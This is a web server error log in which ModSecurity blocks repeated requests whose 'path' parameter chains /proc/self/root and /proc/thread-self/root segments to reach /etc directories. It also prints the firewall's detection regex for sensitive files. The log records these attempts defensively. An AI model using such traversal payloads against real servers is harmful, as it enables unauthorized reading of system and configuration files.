[Wed Mar 18 12:55:23.389134 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:44864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrK6-oXxyEfFpUF8f-DzwAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:55:26.475161 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:57294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrK7tY0UrI5A3LftIzJ6AAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:55:48.016583 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:44012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLBMdf6f5d65gmYZTrmgAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:55:48.369495 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:48448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLBCmAPhZkrhU8w4mD5wAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:56:14.671107 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:43622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLHkzinOy1jxa1j4cs_QAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:56:30.778933 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:43510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLLta6ubjKNq_cu4a0TQAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:56:31.243924 2026] [mime_magic:error] [pid 17887:tid 140411666392832] (70014)End of file found: [client 57.141.18.110:46294] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:56:38.572175 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:41266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLNgkwaGbbGflqUZAnVwAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:56:42.433159 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:37352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLOuyqAr6etmhZHNrdBwAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:56:48.304456 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:34418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLPuoXxyEfFpUF8f-EAwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:57:02.563154 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:33156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLTsdf6f5d65gmYZTryAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:57:03.394314 2026] [mime_magic:error] [pid 26799:tid 140411590858496] (70014)End of file found: [client 57.141.18.93:47722] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:57:07.310695 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:52332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLUymAPhZkrhU8w4mEMAAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:57:19.684379 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:59936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLX-oXxyEfFpUF8f-EGgAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:57:24.103264 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:38352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLZNY0UrI5A3LftIzKZQAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:57:27.865227 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:48820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLZ0zinOy1jxa1j4ctRgAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:57:48.874740 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:48826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLfOyqAr6etmhZHNrdSQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:57:52.869463 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:42548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLgCmAPhZkrhU8w4mEUAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:57:54.224054 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.243.128:42562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLguw_le52K8_3pV31uQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:58:06.038188 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:57700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLjtY0UrI5A3LftIzKsAAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:58:06.675975 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:42568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLjgkwaGbbGflqUZAnngAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:58:08.415784 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:43350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLkEzinOy1jxa1j4ctZAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:58:15.211222 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:43108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLl-yqAr6etmhZHNrdawAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
